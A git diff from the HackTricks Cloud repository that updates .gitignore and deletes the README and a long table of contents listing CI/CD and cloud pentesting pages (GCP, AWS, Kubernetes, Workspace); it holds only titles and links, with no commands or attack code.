diff --git a/.gitbook/assets/empty.zip b/.gitbook/assets/empty.zip deleted file mode 100644 index 15cb0ecb3..000000000 Binary files a/.gitbook/assets/empty.zip and /dev/null differ diff --git a/.gitignore b/.gitignore index 6826262d3..7fa947732 100644 --- a/.gitignore +++ b/.gitignore @@ -30,4 +30,9 @@ Icon .AppleDesktop Network Trash Folder Temporary Items -.apdisk \ No newline at end of file +.apdisk + +#Mdbook +book +book/* +hacktricks-preprocessor.log diff --git a/README.md b/README.md deleted file mode 100644 index 17db20c7d..000000000 --- a/README.md +++ /dev/null @@ -1,67 +0,0 @@ -# HackTricks Cloud - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -
- -_Hacktricks logos & motion designed by_ [_@ppiernacho_](https://www.instagram.com/ppieranacho/)_._ - -{% hint style="success" %} -Welcome to the page where you will find each **hacking trick/technique/whatever related to CI/CD & Cloud** I have learnt in **CTFs**, **real** life **environments**, **researching**, and **reading** researches and news. -{% endhint %} - -### **Pentesting CI/CD Methodology** - -**In the HackTricks CI/CD Methodology you will find how to pentest infrastructure related to CI/CD activities.** Read the following page for an **introduction:** - -{% content-ref url="pentesting-ci-cd/pentesting-ci-cd-methodology.md" %} -[pentesting-ci-cd-methodology.md](pentesting-ci-cd/pentesting-ci-cd-methodology.md) -{% endcontent-ref %} - -### Pentesting Cloud Methodology - -**In the HackTricks Cloud Methodology you will find how to pentest cloud environments.** Read the following page for an **introduction:** - -{% content-ref url="pentesting-cloud/pentesting-cloud-methodology.md" %} -[pentesting-cloud-methodology.md](pentesting-cloud/pentesting-cloud-methodology.md) -{% endcontent-ref %} - -### License & Disclaimer - -**Check them in:** - -{% content-ref url="https://app.gitbook.com/s/-L_2uGJGU7AVNRcqRvEi/welcome/hacktricks-values-and-faq" %} -[HackTricks Values & FAQ](https://app.gitbook.com/s/-L_2uGJGU7AVNRcqRvEi/welcome/hacktricks-values-and-faq) -{% endcontent-ref %} - -### Github Stats - -![HackTricks Cloud Github Stats](https://repobeats.axiom.co/api/embed/1dfdbb0435f74afa9803cd863f01daac17cda336.svg) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/SUMMARY.md b/SUMMARY.md deleted file mode 100644 index 921ed2d3d..000000000 --- a/SUMMARY.md +++ /dev/null @@ -1,503 +0,0 @@ -# Table of contents - -## 👽 Welcome! - -* [HackTricks Cloud](README.md) -* [About the Author](https://book.hacktricks.xyz/welcome/about-the-author) -* [HackTricks Values & faq](https://book.hacktricks.xyz/welcome/hacktricks-values-and-faq) - -## 🏭 Pentesting CI/CD - -* [Pentesting CI/CD Methodology](pentesting-ci-cd/pentesting-ci-cd-methodology.md) -* [Github Security](pentesting-ci-cd/github-security/README.md) - * [Abusing Github Actions](pentesting-ci-cd/github-security/abusing-github-actions/README.md) - * [Gh Actions - Artifact Poisoning](pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-artifact-poisoning.md) - * [GH Actions - Cache Poisoning](pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-cache-poisoning.md) - * [Gh Actions - Context Script Injections](pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-context-script-injections.md) - * [Accessible Deleted Data in Github](pentesting-ci-cd/github-security/accessible-deleted-data-in-github.md) - * [Basic Github Information](pentesting-ci-cd/github-security/basic-github-information.md) -* [Gitea Security](pentesting-ci-cd/gitea-security/README.md) - * [Basic Gitea Information](pentesting-ci-cd/gitea-security/basic-gitea-information.md) -* [Concourse Security](pentesting-ci-cd/concourse-security/README.md) - * [Concourse Architecture](pentesting-ci-cd/concourse-security/concourse-architecture.md) - * [Concourse Lab Creation](pentesting-ci-cd/concourse-security/concourse-lab-creation.md) - * [Concourse Enumeration & Attacks](pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.md) -* [CircleCI Security](pentesting-ci-cd/circleci-security.md) -* [TravisCI Security](pentesting-ci-cd/travisci-security/README.md) - * [Basic TravisCI Information](pentesting-ci-cd/travisci-security/basic-travisci-information.md) -* [Jenkins Security](pentesting-ci-cd/jenkins-security/README.md) - * [Basic Jenkins Information](pentesting-ci-cd/jenkins-security/basic-jenkins-information.md) - * [Jenkins RCE with Groovy Script](pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.md) - * [Jenkins RCE Creating/Modifying Project](pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.md) - * [Jenkins RCE Creating/Modifying Pipeline](pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.md) - * [Jenkins Arbitrary File Read to RCE via "Remember Me"](pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.md) - * [Jenkins Dumping Secrets from Groovy](pentesting-ci-cd/jenkins-security/jenkins-dumping-secrets-from-groovy.md) -* [Apache Airflow Security](pentesting-ci-cd/apache-airflow-security/README.md) - * [Airflow Configuration](pentesting-ci-cd/apache-airflow-security/airflow-configuration.md) - * [Airflow RBAC](pentesting-ci-cd/apache-airflow-security/airflow-rbac.md) -* [Terraform Security](pentesting-ci-cd/terraform-security.md) -* [Atlantis Security](pentesting-ci-cd/atlantis-security.md) -* [Cloudflare Security](pentesting-ci-cd/cloudflare-security/README.md) - * [Cloudflare Domains](pentesting-ci-cd/cloudflare-security/cloudflare-domains.md) - * [Cloudflare Zero Trust Network](pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.md) -* [Okta Security](pentesting-ci-cd/okta-security/README.md) - * [Okta Hardening](pentesting-ci-cd/okta-security/okta-hardening.md) -* [Serverless.com Security](pentesting-ci-cd/serverless.com-security.md) -* [Supabase Security](pentesting-ci-cd/supabase-security.md) -* [Ansible Tower / AWX / Automation controller Security](pentesting-ci-cd/ansible-tower-awx-automation-controller-security.md) -* [Vercel Security](pentesting-ci-cd/vercel-security.md) -* [TODO](pentesting-ci-cd/todo.md) - -## ⛈️ Pentesting Cloud - -* [Pentesting Cloud Methodology](pentesting-cloud/pentesting-cloud-methodology.md) -* [Kubernetes Pentesting](pentesting-cloud/kubernetes-security/README.md) - * [Kubernetes Basics](pentesting-cloud/kubernetes-security/kubernetes-basics.md) - * [Pentesting Kubernetes Services](pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/README.md) - * [Kubelet Authentication & Authorization](pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/kubelet-authentication-and-authorization.md) - * [Exposing Services in Kubernetes](pentesting-cloud/kubernetes-security/exposing-services-in-kubernetes.md) - * [Attacking Kubernetes from inside a Pod](pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.md) - * [Kubernetes Enumeration](pentesting-cloud/kubernetes-security/kubernetes-enumeration.md) - * [Kubernetes Role-Based Access Control(RBAC)](pentesting-cloud/kubernetes-security/kubernetes-role-based-access-control-rbac.md) - * [Abusing Roles/ClusterRoles in Kubernetes](pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/README.md) - * [Pod Escape Privileges](pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/pod-escape-privileges.md) - * [Kubernetes Roles Abuse Lab](pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/kubernetes-roles-abuse-lab.md) - * [Kubernetes Namespace Escalation](pentesting-cloud/kubernetes-security/kubernetes-namespace-escalation.md) - * [Kubernetes External Secret Operator](pentesting-cloud/kubernetes-security/kubernetes-external-secrets-operator.md) - * [Kubernetes Pivoting to Clouds](pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds.md) - * [Kubernetes Network Attacks](pentesting-cloud/kubernetes-security/kubernetes-network-attacks.md) - * [Kubernetes Hardening](pentesting-cloud/kubernetes-security/kubernetes-hardening/README.md) - * [Kubernetes SecurityContext(s)](pentesting-cloud/kubernetes-security/kubernetes-hardening/kubernetes-securitycontext-s.md) - * [Kubernetes OPA Gatekeeper](pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/README.md) - * [Kubernetes OPA Gatekeeper bypass](pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/kubernetes-opa-gatekeeper-bypass.md) - * [Kubernetes Kyverno](pentesting-cloud/kubernetes-security/kubernetes-kyverno/README.md) - * [Kubernetes Kyverno bypass](pentesting-cloud/kubernetes-security/kubernetes-kyverno/kubernetes-kyverno-bypass.md) - * [Kubernetes ValidatingWebhookConfiguration](pentesting-cloud/kubernetes-security/kubernetes-validatingwebhookconfiguration.md) -* [GCP Pentesting](pentesting-cloud/gcp-security/README.md) - * [GCP - Basic Information](pentesting-cloud/gcp-security/gcp-basic-information/README.md) - * [GCP - Federation Abuse](pentesting-cloud/gcp-security/gcp-basic-information/gcp-federation-abuse.md) - * [GCP - Permissions for a Pentest](pentesting-cloud/gcp-security/gcp-permissions-for-a-pentest.md) - * [GCP - Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/README.md) - * [GCP - App Engine Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-app-engine-post-exploitation.md) - * [GCP - Artifact Registry Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-artifact-registry-post-exploitation.md) - * [GCP - Cloud Build Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-build-post-exploitation.md) - * [GCP - Cloud Functions Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-functions-post-exploitation.md) - * [GCP - Cloud Run Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-run-post-exploitation.md) - * [GCP - Cloud Shell Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-shell-post-exploitation.md) - * [GCP - Cloud SQL Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.md) - * [GCP - Compute Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.md) - * [GCP - Filestore Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-filestore-post-exploitation.md) - * [GCP - IAM Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-iam-post-exploitation.md) - * [GCP - KMS Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.md) - * [GCP - Logging Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.md) - * [GCP - Monitoring Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.md) - * [GCP - Pub/Sub Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.md) - * [GCP - Secretmanager Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-secretmanager-post-exploitation.md) - * [GCP - Security Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.md) - * [GCP - Workflows Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-workflows-post-exploitation.md) - * [GCP - Storage Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-storage-post-exploitation.md) - * [GCP - Privilege Escalation](pentesting-cloud/gcp-security/gcp-privilege-escalation/README.md) - * [GCP - Apikeys Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.md) - * [GCP - AppEngine Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.md) - * [GCP - Artifact Registry Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-artifact-registry-privesc.md) - * [GCP - Batch Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-batch-privesc.md) - * [GCP - BigQuery Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigquery-privesc.md) - * [GCP - ClientAuthConfig Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-clientauthconfig-privesc.md) - * [GCP - Cloudbuild Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.md) - * [GCP - Cloudfunctions Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.md) - * [GCP - Cloudidentity Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudidentity-privesc.md) - * [GCP - Cloud Scheduler Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudscheduler-privesc.md) - * [GCP - Compute Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/README.md) - * [GCP - Add Custom SSH Metadata](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.md) - * [GCP - Composer Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.md) - * [GCP - Container Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.md) - * [GCP - Deploymentmaneger Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.md) - * [GCP - IAM Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.md) - * [GCP - KMS Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-kms-privesc.md) - * [GCP - Orgpolicy Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-orgpolicy-privesc.md) - * [GCP - Pubsub Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-pubsub-privesc.md) - * [GCP - Resourcemanager Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-resourcemanager-privesc.md) - * [GCP - Run Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.md) - * [GCP - Secretmanager Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-secretmanager-privesc.md) - * [GCP - Serviceusage Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-serviceusage-privesc.md) - * [GCP - Sourcerepos Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-sourcerepos-privesc.md) - * [GCP - Storage Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.md) - * [GCP - Workflows Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-workflows-privesc.md) - * [GCP - Generic Permissions Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-misc-perms-privesc.md) - * [GCP - Network Docker Escape](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-network-docker-escape.md) - * [GCP - local privilege escalation ssh pivoting](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.md) - * [GCP - Persistence](pentesting-cloud/gcp-security/gcp-persistence/README.md) - * [GCP - API Keys Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-api-keys-persistence.md) - * [GCP - App Engine Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-app-engine-persistence.md) - * [GCP - Artifact Registry Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-artifact-registry-persistence.md) - * [GCP - BigQuery Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-bigquery-persistence.md) - * [GCP - Cloud Functions Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-functions-persistence.md) - * [GCP - Cloud Run Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-run-persistence.md) - * [GCP - Cloud Shell Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-shell-persistence.md) - * [GCP - Cloud SQL Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-sql-persistence.md) - * [GCP - Compute Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-compute-persistence.md) - * [GCP - Dataflow Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-dataflow-persistence.md) - * [GCP - Filestore Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-filestore-persistence.md) - * [GCP - Logging Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-logging-persistence.md) - * [GCP - Secret Manager Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-secret-manager-persistence.md) - * [GCP - Storage Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-storage-persistence.md) - * [GCP - Token Persistance](pentesting-cloud/gcp-security/gcp-persistence/gcp-non-svc-persistance.md) - * [GCP - Services](pentesting-cloud/gcp-security/gcp-services/README.md) - * [GCP - AI Platform Enum](pentesting-cloud/gcp-security/gcp-services/gcp-ai-platform-enum.md) - * [GCP - API Keys Enum](pentesting-cloud/gcp-security/gcp-services/gcp-api-keys-enum.md) - * [GCP - App Engine Enum](pentesting-cloud/gcp-security/gcp-services/gcp-app-engine-enum.md) - * [GCP - Artifact Registry Enum](pentesting-cloud/gcp-security/gcp-services/gcp-artifact-registry-enum.md) - * [GCP - Batch Enum](pentesting-cloud/gcp-security/gcp-services/gcp-batch-enum.md) - * [GCP - Bigquery Enum](pentesting-cloud/gcp-security/gcp-services/gcp-bigquery-enum.md) - * [GCP - Bigtable Enum](pentesting-cloud/gcp-security/gcp-services/gcp-bigtable-enum.md) - * [GCP - Cloud Build Enum](pentesting-cloud/gcp-security/gcp-services/gcp-cloud-build-enum.md) - * [GCP - Cloud Functions Enum](pentesting-cloud/gcp-security/gcp-services/gcp-cloud-functions-enum.md) - * [GCP - Cloud Run Enum](pentesting-cloud/gcp-security/gcp-services/gcp-cloud-run-enum.md) - * [GCP - Cloud Shell Enum](pentesting-cloud/gcp-security/gcp-services/gcp-cloud-shell-enum.md) - * [GCP - Cloud SQL Enum](pentesting-cloud/gcp-security/gcp-services/gcp-cloud-sql-enum.md) - * [GCP - Cloud Scheduler Enum](pentesting-cloud/gcp-security/gcp-services/gcp-cloud-scheduler-enum.md) - * [GCP - Compute Enum](pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/README.md) - * [GCP - Compute Instances](pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-compute-instance.md) - * [GCP - VPC & Networking](pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-vpc-and-networking.md) - * [GCP - Composer Enum](pentesting-cloud/gcp-security/gcp-services/gcp-composer-enum.md) - * [GCP - Containers & GKE Enum](pentesting-cloud/gcp-security/gcp-services/gcp-containers-gke-and-composer-enum.md) - * [GCP - DNS Enum](pentesting-cloud/gcp-security/gcp-services/gcp-dns-enum.md) - * [GCP - Filestore Enum](pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.md) - * [GCP - Firebase Enum](pentesting-cloud/gcp-security/gcp-services/gcp-firebase-enum.md) - * [GCP - Firestore Enum](pentesting-cloud/gcp-security/gcp-services/gcp-firestore-enum.md) - * [GCP - IAM, Principals & Org Policies Enum](pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.md) - * [GCP - KMS Enum](pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.md) - * [GCP - Logging Enum](pentesting-cloud/gcp-security/gcp-services/gcp-logging-enum.md) - * [GCP - Memorystore Enum](pentesting-cloud/gcp-security/gcp-services/gcp-memorystore-enum.md) - * [GCP - Monitoring Enum](pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.md) - * [GCP - Pub/Sub Enum](pentesting-cloud/gcp-security/gcp-services/gcp-pub-sub.md) - * [GCP - Secrets Manager Enum](pentesting-cloud/gcp-security/gcp-services/gcp-secrets-manager-enum.md) - * [GCP - Security Enum](pentesting-cloud/gcp-security/gcp-services/gcp-security-enum.md) - * [GCP - Source Repositories Enum](pentesting-cloud/gcp-security/gcp-services/gcp-source-repositories-enum.md) - * [GCP - Spanner Enum](pentesting-cloud/gcp-security/gcp-services/gcp-spanner-enum.md) - * [GCP - Stackdriver Enum](pentesting-cloud/gcp-security/gcp-services/gcp-stackdriver-enum.md) - * [GCP - Storage Enum](pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.md) - * [GCP - Workflows Enum](pentesting-cloud/gcp-security/gcp-services/gcp-workflows-enum.md) - * [GCP <--> Workspace Pivoting](pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/README.md) - * [GCP - Understanding Domain-Wide Delegation](pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/gcp-understanding-domain-wide-delegation.md) - * [GCP - Unauthenticated Enum & Access](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/README.md) - * [GCP - API Keys Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-api-keys-unauthenticated-enum.md) - * [GCP - App Engine Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-app-engine-unauthenticated-enum.md) - * [GCP - Artifact Registry Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-artifact-registry-unauthenticated-enum.md) - * [GCP - Cloud Build Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-build-unauthenticated-enum.md) - * [GCP - Cloud Functions Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-functions-unauthenticated-enum.md) - * [GCP - Cloud Run Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-run-unauthenticated-enum.md) - * [GCP - Cloud SQL Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-sql-unauthenticated-enum.md) - * [GCP - Compute Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-compute-unauthenticated-enum.md) - * [GCP - IAM, Principals & Org Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-iam-principals-and-org-unauthenticated-enum.md) - * [GCP - Source Repositories Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-source-repositories-unauthenticated-enum.md) - * [GCP - Storage Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/README.md) - * [GCP - Public Buckets Privilege Escalation](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/gcp-public-buckets-privilege-escalation.md) -* [GWS - Workspace Pentesting](pentesting-cloud/workspace-security/README.md) - * [GWS - Post Exploitation](pentesting-cloud/workspace-security/gws-post-exploitation.md) - * [GWS - Persistence](pentesting-cloud/workspace-security/gws-persistence.md) - * [GWS - Workspace Sync Attacks (GCPW, GCDS, GPS, Directory Sync with AD & EntraID)](pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/README.md) - * [GWS - Admin Directory Sync](pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gws-admin-directory-sync.md) - * [GCDS - Google Cloud Directory Sync](pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcds-google-cloud-directory-sync.md) - * [GCPW - Google Credential Provider for Windows](pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.md) - * [GPS - Google Password Sync](pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gps-google-password-sync.md) - * [GWS - Google Platforms Phishing](pentesting-cloud/workspace-security/gws-google-platforms-phishing/README.md) - * [GWS - App Scripts](pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.md) -* [AWS Pentesting](pentesting-cloud/aws-security/README.md) - * [AWS - Basic Information](pentesting-cloud/aws-security/aws-basic-information/README.md) - * [AWS - Federation Abuse](pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md) - * [AWS - Permissions for a Pentest](pentesting-cloud/aws-security/aws-permissions-for-a-pentest.md) - * [AWS - Persistence](pentesting-cloud/aws-security/aws-persistence/README.md) - * [AWS - API Gateway Persistence](pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.md) - * [AWS - Cognito Persistence](pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.md) - * [AWS - DynamoDB Persistence](pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.md) - * [AWS - EC2 Persistence](pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.md) - * [AWS - ECR Persistence](pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md) - * [AWS - ECS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.md) - * [AWS - Elastic Beanstalk Persistence](pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.md) - * [AWS - EFS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.md) - * [AWS - IAM Persistence](pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.md) - * [AWS - KMS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.md) - * [AWS - Lambda Persistence](pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/README.md) - * [AWS - Abusing Lambda Extensions](pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md) - * [AWS - Lambda Layers Persistence](pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md) - * [AWS - Lightsail Persistence](pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.md) - * [AWS - RDS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.md) - * [AWS - S3 Persistence](pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.md) - * [AWS - SNS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.md) - * [AWS - Secrets Manager Persistence](pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.md) - * [AWS - SQS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.md) - * [AWS - SSM Perssitence](pentesting-cloud/aws-security/aws-persistence/aws-ssm-perssitence.md) - * [AWS - Step Functions Persistence](pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.md) - * [AWS - STS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.md) - * [AWS - Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/README.md) - * [AWS - API Gateway Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.md) - * [AWS - CloudFront Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.md) - * [AWS - CodeBuild Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/README.md) - * [AWS Codebuild - Token Leakage](pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md) - * [AWS - Control Tower Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.md) - * [AWS - DLM Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.md) - * [AWS - DynamoDB Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.md) - * [AWS - EC2, EBS, SSM & VPC Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md) - * [AWS - EBS Snapshot Dump](pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md) - * [AWS - Malicious VPC Mirror](pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-malicious-vpc-mirror.md) - * [AWS - ECR Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-ecr-post-exploitation.md) - * [AWS - ECS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.md) - * [AWS - EFS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.md) - * [AWS - EKS Post 